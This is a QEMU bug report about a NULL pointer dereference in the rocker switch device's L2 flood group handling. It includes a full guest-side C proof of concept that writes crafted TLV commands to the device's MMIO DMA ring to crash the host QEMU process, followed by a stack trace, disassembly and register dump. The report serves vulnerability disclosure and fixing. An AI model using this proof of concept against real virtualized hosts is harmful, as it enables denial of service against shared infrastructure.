hw/net/rocker: NULL pointer dereference in of_dpa_cmd_add_l2_flood
Reporter: Ao Wang <arayz_w@icloud.com\> (DBAPPSecurity)
Environment
-
Host architecture: ubuntu-20.04.4-desktop-amd64
-
Guest architecture: ubuntu-20.04.4-server-amd64
-
QEMU tested version: commit a2d860bb
-
QEMU command line:
./qemu-system-x86_64 -enable-kvm -hda ../ubuntu.img -m 2G -net user,hostfwd=tcp::2222-:22 -net nic -netdev tap,ifname=tap0,id=dev1,script=no,downscript=no -device rocker,name=sw1,len-ports=1
Description of problem
rocker_tlv_parse_nested could return early because of no group ids in the group_tlvs. In such case tlvs is NULL; tlvs[i + 1] in the next for-loop will deref the NULL pointer.
Steps to reproduce
Compile and run the following code within the guest:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/io.h>
#include <stdint.h>
#include <stdbool.h>
#include <err.h>
#include <errno.h>
#include <pthread.h>
/*
* Rocker DMA ring register offsets
*/
#define ROCKER_DMA_DESC_BASE 0x1000
#define ROCKER_DMA_DESC_SIZE 32
#define ROCKER_DMA_DESC_MASK 0x1F
#define ROCKER_DMA_DESC_TOTAL_SIZE \
(ROCKER_DMA_DESC_SIZE * 64) /* 62 ports + event + cmd */
#define ROCKER_DMA_DESC_ADDR_OFFSET 0x00 /* 8-byte */
#define ROCKER_DMA_DESC_SIZE_OFFSET 0x08
#define ROCKER_DMA_DESC_HEAD_OFFSET 0x0c
#define ROCKER_DMA_DESC_TAIL_OFFSET 0x10
#define ROCKER_DMA_DESC_CTRL_OFFSET 0x14
#define ROCKER_DMA_DESC_CREDITS_OFFSET 0x18
#define ROCKER_DMA_DESC_RSVD_OFFSET 0x1c
/*
* Rocker dma ctrl register bits
*/
#define ROCKER_DMA_DESC_CTRL_RESET (1 << 0)
/*
* Rocker test registers
*/
#define ROCKER_TEST_REG 0x0010
#define ROCKER_TEST_REG64 0x0018 /* 8-byte */
#define ROCKER_TEST_IRQ 0x0020
#define ROCKER_TEST_DMA_ADDR 0x0028 /* 8-byte */
#define ROCKER_TEST_DMA_SIZE 0x0030
#define ROCKER_TEST_DMA_CTRL 0x0034
/*
* Rocker general purpose registers
*/
#define ROCKER_CONTROL 0x0300
#define ROCKER_PORT_PHYS_COUNT 0x0304
#define ROCKER_PORT_PHYS_LINK_STATUS 0x0310 /* 8-byte */
#define ROCKER_PORT_PHYS_ENABLE 0x0318 /* 8-byte */
#define ROCKER_SWITCH_ID 0x0320 /* 8-byte */
/*
* Rocker test register ctrl
*/
#define ROCKER_TEST_DMA_CTRL_CLEAR (1 << 0)
#define ROCKER_TEST_DMA_CTRL_FILL (1 << 1)
#define ROCKER_TEST_DMA_CTRL_INVERT (1 << 2)
#define __le16 uint16_t
#define __le32 uint32_t
#define __le64 uint64_t
typedef struct rocker_desc {
__le64 buf_addr;
uint64_t cookie;
__le16 buf_size;
__le16 tlv_size;
__le16 rsvd[5]; /* pad to 32 bytes */
__le16 comp_err;
} __attribute__((packed, aligned(8))) RockerDesc;
/*
* Rocker TLV type fields
*/
typedef struct rocker_tlv {
__le32 type;
__le16 len;
__le16 rsvd;
} __attribute__((packed, aligned(8))) RockerTlv;
typedef struct cmd_group_msg {
RockerTlv tlv1;
__le64 t1_value;
RockerTlv tlv2;
__le64 t2_value;
RockerTlv tlv3;
__le64 t3_value;
} __attribute__((packed, aligned(8))) CmdGroupMsg;
typedef struct cmd_msg {
RockerTlv tlv1;
__le64 t1_value;
RockerTlv tlv2;
CmdGroupMsg group_msg;
} __attribute__((packed, aligned(8))) CmdMsg;
typedef struct rx_msg {
RockerTlv tlv1;
__le64 t1_value;
RockerTlv tlv2;
__le64 t2_value;
RockerTlv tlv3;
__le64 t3_value;
RockerTlv tlv4;
__le64 t4_value;
RockerTlv tlv5;
__le64 t5_value;
} __attribute__((packed, aligned(8))) RxMsg;
/* Rx msg */
enum {
ROCKER_TLV_RX_UNSPEC,
ROCKER_TLV_RX_FLAGS, /* u16, see RX_FLAGS_ */
ROCKER_TLV_RX_CSUM, /* u16 */
ROCKER_TLV_RX_FRAG_ADDR, /* u64 */
ROCKER_TLV_RX_FRAG_MAX_LEN, /* u16 */
ROCKER_TLV_RX_FRAG_LEN, /* u16 */
__ROCKER_TLV_RX_MAX,
ROCKER_TLV_RX_MAX = __ROCKER_TLV_RX_MAX - 1,
};
/* Tx msg */
enum {
ROCKER_TLV_TX_UNSPEC,
ROCKER_TLV_TX_OFFLOAD, /* u8, see TX_OFFLOAD_ */
ROCKER_TLV_TX_L3_CSUM_OFF, /* u16 */
ROCKER_TLV_TX_TSO_MSS, /* u16 */
ROCKER_TLV_TX_TSO_HDR_LEN, /* u16 */
ROCKER_TLV_TX_FRAGS, /* array */
__ROCKER_TLV_TX_MAX,
ROCKER_TLV_TX_MAX = __ROCKER_TLV_TX_MAX - 1,
};
/* cmd msg */
enum {
ROCKER_TLV_CMD_UNSPEC,
ROCKER_TLV_CMD_TYPE, /* u16 */
ROCKER_TLV_CMD_INFO, /* nest */
__ROCKER_TLV_CMD_MAX,
ROCKER_TLV_CMD_MAX = __ROCKER_TLV_CMD_MAX - 1,
};
enum {
ROCKER_TLV_CMD_TYPE_UNSPEC,
ROCKER_TLV_CMD_TYPE_GET_PORT_SETTINGS,
ROCKER_TLV_CMD_TYPE_SET_PORT_SETTINGS,
ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_ADD,
ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_MOD,
ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_DEL,
ROCKER_TLV_CMD_TYPE_OF_DPA_FLOW_GET_STATS,
ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_ADD,
ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_MOD,
ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_DEL,
ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_GET_STATS,
__ROCKER_TLV_CMD_TYPE_MAX,
ROCKER_TLV_CMD_TYPE_MAX = __ROCKER_TLV_CMD_TYPE_MAX - 1,
};
/*
* cmd info nested for OF-DPA msgs
*/
enum {
ROCKER_TLV_OF_DPA_UNSPEC,
ROCKER_TLV_OF_DPA_TABLE_ID, /* u16 */
ROCKER_TLV_OF_DPA_PRIORITY, /* u32 */
ROCKER_TLV_OF_DPA_HARDTIME, /* u32 */
ROCKER_TLV_OF_DPA_IDLETIME, /* u32 */
ROCKER_TLV_OF_DPA_COOKIE, /* u64 */
ROCKER_TLV_OF_DPA_IN_PPORT, /* u32 */
ROCKER_TLV_OF_DPA_IN_PPORT_MASK, /* u32 */
ROCKER_TLV_OF_DPA_OUT_PPORT, /* u32 */
ROCKER_TLV_OF_DPA_GOTO_TABLE_ID, /* u16 */
ROCKER_TLV_OF_DPA_GROUP_ID, /* u32 */
ROCKER_TLV_OF_DPA_GROUP_ID_LOWER, /* u32 */
ROCKER_TLV_OF_DPA_GROUP_COUNT, /* u16 */
ROCKER_TLV_OF_DPA_GROUP_IDS, /* u32 array */
ROCKER_TLV_OF_DPA_VLAN_ID, /* __be16 */
ROCKER_TLV_OF_DPA_VLAN_ID_MASK, /* __be16 */
ROCKER_TLV_OF_DPA_VLAN_PCP, /* __be16 */
ROCKER_TLV_OF_DPA_VLAN_PCP_MASK, /* __be16 */
ROCKER_TLV_OF_DPA_VLAN_PCP_ACTION, /* u8 */
ROCKER_TLV_OF_DPA_NEW_VLAN_ID, /* __be16 */
ROCKER_TLV_OF_DPA_NEW_VLAN_PCP, /* u8 */
ROCKER_TLV_OF_DPA_TUNNEL_ID, /* u32 */
ROCKER_TLV_OF_DPA_TUNNEL_LPORT, /* u32 */
ROCKER_TLV_OF_DPA_ETHERTYPE, /* __be16 */
ROCKER_TLV_OF_DPA_DST_MAC, /* binary */
ROCKER_TLV_OF_DPA_DST_MAC_MASK, /* binary */
ROCKER_TLV_OF_DPA_SRC_MAC, /* binary */
ROCKER_TLV_OF_DPA_SRC_MAC_MASK, /* binary */
ROCKER_TLV_OF_DPA_IP_PROTO, /* u8 */
ROCKER_TLV_OF_DPA_IP_PROTO_MASK, /* u8 */
ROCKER_TLV_OF_DPA_IP_DSCP, /* u8 */
ROCKER_TLV_OF_DPA_IP_DSCP_MASK, /* u8 */
ROCKER_TLV_OF_DPA_IP_DSCP_ACTION, /* u8 */
ROCKER_TLV_OF_DPA_NEW_IP_DSCP, /* u8 */
ROCKER_TLV_OF_DPA_IP_ECN, /* u8 */
ROCKER_TLV_OF_DPA_IP_ECN_MASK, /* u8 */
ROCKER_TLV_OF_DPA_DST_IP, /* __be32 */
ROCKER_TLV_OF_DPA_DST_IP_MASK, /* __be32 */
ROCKER_TLV_OF_DPA_SRC_IP, /* __be32 */
ROCKER_TLV_OF_DPA_SRC_IP_MASK, /* __be32 */
ROCKER_TLV_OF_DPA_DST_IPV6, /* binary */
ROCKER_TLV_OF_DPA_DST_IPV6_MASK, /* binary */
ROCKER_TLV_OF_DPA_SRC_IPV6, /* binary */
ROCKER_TLV_OF_DPA_SRC_IPV6_MASK, /* binary */
ROCKER_TLV_OF_DPA_SRC_ARP_IP, /* __be32 */
ROCKER_TLV_OF_DPA_SRC_ARP_IP_MASK, /* __be32 */
ROCKER_TLV_OF_DPA_L4_DST_PORT, /* __be16 */
ROCKER_TLV_OF_DPA_L4_DST_PORT_MASK, /* __be16 */
ROCKER_TLV_OF_DPA_L4_SRC_PORT, /* __be16 */
ROCKER_TLV_OF_DPA_L4_SRC_PORT_MASK, /* __be16 */
ROCKER_TLV_OF_DPA_ICMP_TYPE, /* u8 */
ROCKER_TLV_OF_DPA_ICMP_TYPE_MASK, /* u8 */
ROCKER_TLV_OF_DPA_ICMP_CODE, /* u8 */
ROCKER_TLV_OF_DPA_ICMP_CODE_MASK, /* u8 */
ROCKER_TLV_OF_DPA_IPV6_LABEL, /* __be32 */
ROCKER_TLV_OF_DPA_IPV6_LABEL_MASK, /* __be32 */
ROCKER_TLV_OF_DPA_QUEUE_ID_ACTION, /* u8 */
ROCKER_TLV_OF_DPA_NEW_QUEUE_ID, /* u8 */
ROCKER_TLV_OF_DPA_CLEAR_ACTIONS, /* u32 */
ROCKER_TLV_OF_DPA_POP_VLAN, /* u8 */
ROCKER_TLV_OF_DPA_TTL_CHECK, /* u8 */
ROCKER_TLV_OF_DPA_COPY_CPU_ACTION, /* u8 */
__ROCKER_TLV_OF_DPA_MAX,
ROCKER_TLV_OF_DPA_MAX = __ROCKER_TLV_OF_DPA_MAX - 1,
};
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
uint64_t get_physical_pfn(void* ptr)
{
uint64_t pfn = -1;
FILE* fp = fopen("/proc/self/pagemap", "rb");
if (!fp)
{
return pfn;
}
if (!fseek(fp, (unsigned long)ptr / PAGE_SIZE * 8, SEEK_SET))
{
fread(&pfn, sizeof(pfn), 1, fp);
if (pfn & PFN_PRESENT)
{
pfn &= PFN_PFN;
}
}
fclose(fp);
return pfn;
}
uint64_t get_physical_addr(void* ptr)
{
uint64_t pfn = get_physical_pfn(ptr);
return pfn * PAGE_SIZE + (uint64_t)ptr % PAGE_SIZE;
}
void* mmio_mem;
void mmio_write(uint32_t addr, uint32_t value)
{
*((uint32_t*)(mmio_mem + addr))= value;
}
void mmio_write64(uint32_t addr, uint64_t value)
{
*((uint64_t*)(mmio_mem + addr))= value;
}
uint64_t mmio_read(uint32_t addr)
{
return *((uint64_t*)(mmio_mem +addr));
}
uint64_t mmio_read64(uint64_t addr)
{
return *((uint64_t*)(mmio_mem +addr));
}
uint64_t ring_desk_base_addr(int index)
{
return ROCKER_DMA_DESC_BASE + index * 32;
}
int main()
{
int mmio_fd= open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
if (mmio_fd== -1) {
printf("mmio_fd open failed");
return 1;
}
mmio_mem = mmap(0, 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
if (mmio_mem == MAP_FAILED) {
printf("mmap mmio_mem failed");
return 1;
}
iopl(3);
RockerTlv cmd_group_tlv = {ROCKER_TLV_OF_DPA_GROUP_ID, sizeof(RockerTlv) + sizeof(__le64), 12345 };
RockerTlv cmd_count_tlv = {ROCKER_TLV_OF_DPA_GROUP_COUNT, sizeof(RockerTlv) + sizeof(__le64), 12345};
RockerTlv cmd_ids_tlv = {ROCKER_TLV_OF_DPA_GROUP_IDS, sizeof(RockerTlv) + sizeof(__le64), 12345 };
CmdGroupMsg group_msg = { cmd_group_tlv, 0x40000000, cmd_count_tlv, 65535, cmd_ids_tlv, 12345};
RockerTlv cmd_type_tlv = {ROCKER_TLV_CMD_TYPE, sizeof(RockerTlv) + sizeof(__le64), 12345 };
RockerTlv cmd_info_tlv = {ROCKER_TLV_CMD_INFO, sizeof(RockerTlv) + sizeof(CmdGroupMsg), 12345 };
CmdMsg cmd_msg = {cmd_type_tlv, ROCKER_TLV_CMD_TYPE_OF_DPA_GROUP_ADD, cmd_info_tlv, group_msg };
RockerDesc cmd_desc = {get_physical_addr(&cmd_msg), 0xdeadbeef, sizeof(CmdMsg), sizeof(CmdMsg), 0x1, 0x4242 };
mmio_write64(ROCKER_PORT_PHYS_ENABLE, 0xE);
// cmd ring
mmio_write(ring_desk_base_addr(0) + ROCKER_DMA_DESC_CTRL_OFFSET, ROCKER_DMA_DESC_CTRL_RESET);
// base_addr
mmio_write64(ring_desk_base_addr(0), get_physical_addr(&cmd_desc));
mmio_write(ring_desk_base_addr(0) + ROCKER_DMA_DESC_SIZE_OFFSET, 8);
mmio_write(ring_desk_base_addr(0) + ROCKER_DMA_DESC_HEAD_OFFSET, 4);
printf("End\n");
return 0;
}Stack trace:
===================================================================================================
ldl_he_p(const void * ptr) (/home/arayz/arayz/qemu-git-e1000e/include/qemu/bswap.h:359)
ldl_le_p(const void * ptr) (/home/arayz/arayz/qemu-git-e1000e/include/qemu/bswap.h:394)
rocker_tlv_get_le32(const RockerTlv * tlv) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_tlv.h:114)
of_dpa_cmd_add_l2_flood(OfDpa * of_dpa, OfDpaGroup * group, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2043)
of_dpa_cmd_group_do(OfDpa * of_dpa, uint32_t group_id, OfDpaGroup * group, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2125)
of_dpa_cmd_group_add(OfDpa * of_dpa, uint32_t group_id, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2145)
of_dpa_group_cmd(OfDpa * of_dpa, struct desc_info * info, char * buf, uint16_t cmd, RockerTlv ** group_tlvs) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2204)
of_dpa_cmd(World * world, struct desc_info * info, char * buf, uint16_t cmd, RockerTlv * cmd_info_tlv) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_of_dpa.c:2234)
world_do_cmd(World * world, DescInfo * info, char * buf, uint16_t cmd, RockerTlv * cmd_info_tlv) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_world.c:43)
cmd_consume(Rocker * r, DescInfo * info) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker.c:450)
ring_pump(DescRing * ring) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_desc.c:242)
desc_ring_set_head(DescRing * ring, uint32_t new) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker_desc.c:281)
rocker_io_writel(void * opaque, hwaddr addr, uint32_t val) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker.c:805)
rocker_mmio_write(void * opaque, hwaddr addr, uint64_t val, unsigned int size) (/home/arayz/arayz/qemu-git-e1000e/hw/net/rocker/rocker.c:996)
memory_region_write_accessor(MemoryRegion * mr, hwaddr addr, uint64_t * value, unsigned int size, int shift, uint64_t mask, MemTxAttrs attrs) (/home/arayz/arayz/qemu-git-e1000e/softmmu/memory.c:492)
access_with_adjusted_size(hwaddr addr, uint64_t * value, unsigned int size, unsigned int access_size_min, unsigned int access_size_max, MemTxResult (*)(MemoryRegion *, hwaddr, uint64_t *, unsigned int, int, uint64_t, MemTxAttrs) access_fn, MemoryRegion * mr, MemTxAttrs attrs) (/home/arayz/arayz/qemu-git-e1000e/softmmu/memory.c:554)
memory_region_dispatch_write(MemoryRegion * mr, hwaddr addr, uint64_t data, MemOp op, MemTxAttrs attrs) (/home/arayz/arayz/qemu-git-e1000e/softmmu/memory.c:1514)
flatview_write_continue(FlatView * fv, hwaddr addr, MemTxAttrs attrs, const void * ptr, hwaddr len, hwaddr addr1, hwaddr l, MemoryRegion * mr) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2783)
flatview_write(FlatView * fv, hwaddr addr, MemTxAttrs attrs, const void * buf, hwaddr len) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2823)
address_space_write(AddressSpace * as, hwaddr addr, MemTxAttrs attrs, const void * buf, hwaddr len) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2915)
address_space_rw(AddressSpace * as, hwaddr addr, MemTxAttrs attrs, void * buf, hwaddr len, _Bool is_write) (/home/arayz/arayz/qemu-git-e1000e/softmmu/physmem.c:2925)
kvm_cpu_exec(CPUState * cpu) (/home/arayz/arayz/qemu-git-e1000e/accel/kvm/kvm-all.c:2929)
kvm_vcpu_thread_fn(void * arg) (/home/arayz/arayz/qemu-git-e1000e/accel/kvm/kvm-accel-ops.c:49)
qemu_thread_start(void * args) (/home/arayz/arayz/qemu-git-e1000e/util/qemu-thread-posix.c:556)
libpthread.so.0!start_thread(void * arg) (/build/glibc-sMfBJT/glibc-2.31/nptl/pthread_create.c:477)
libc.so.6!clone() (/build/glibc-sMfBJT/glibc-2.31/sysdeps/unix/sysv/linux/x86_64/clone.S:95)
===================================================================================================
disassemble and register context:
===================================================================================================
Dump of assembler code for function ldl_he_p:
0x000055d8a1a473e6 <+0>: push %rbp
0x000055d8a1a473e7 <+1>: mov %rsp,%rbp
0x000055d8a1a473ea <+4>: sub $0x20,%rsp
0x000055d8a1a473ee <+8>: mov %rdi,-0x18(%rbp)
0x000055d8a1a473f2 <+12>: mov %fs:0x28,%rax
0x000055d8a1a473fb <+21>: mov %rax,-0x8(%rbp)
0x000055d8a1a473ff <+25>: xor %eax,%eax
0x000055d8a1a47401 <+27>: mov -0x18(%rbp),%rax
=> 0x000055d8a1a47405 <+31>: mov (%rax),%eax
0x000055d8a1a47407 <+33>: mov %eax,-0xc(%rbp)
0x000055d8a1a4740a <+36>: mov -0xc(%rbp),%eax
0x000055d8a1a4740d <+39>: mov -0x8(%rbp),%rdx
0x000055d8a1a47411 <+43>: xor %fs:0x28,%rdx
0x000055d8a1a4741a <+52>: je 0x55d8a1a47421 <ldl_he_p+59>
0x000055d8a1a4741c <+54>: callq 0x55d8a186d6d0 <__stack_chk_fail@plt>
0x000055d8a1a47421 <+59>: leaveq
0x000055d8a1a47422 <+60>: retq
End of assembler dump.
rax 0x8 8
rbx 0x7f7828088ac0 140154044451520
rcx 0x0 0
rdx 0x7f7828088ac0 140154044451520
rsi 0x8 8
rdi 0x8 8
rbp 0x7f7832cfd100 0x7f7832cfd100
rsp 0x7f7832cfd0e0 0x7f7832cfd0e0
r8 0x7f7828088ac0 140154044451520
r9 0x7f7828000790 140154043893648
r10 0x7f78280008d0 140154043893968
r11 0x7f7828000080 140154043891840
r12 0x7ffec007cb1e 140732120156958
r13 0x7ffec007cb1f 140732120156959
r14 0x7ffec007cbe0 140732120157152
r15 0x7f7832cfdb00 140154225285888
rip 0x55d8a1a47405 0x55d8a1a47405 <ldl_he_p+31>
eflags 0x10246 [ PF ZF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
===================================================================================================Additional information
This was wrongly assigned a high-severity CVE and is being discussed on qemu-devel ML: https://lists.nongnu.org/archive/html/qemu-devel/2023-08/msg04621.html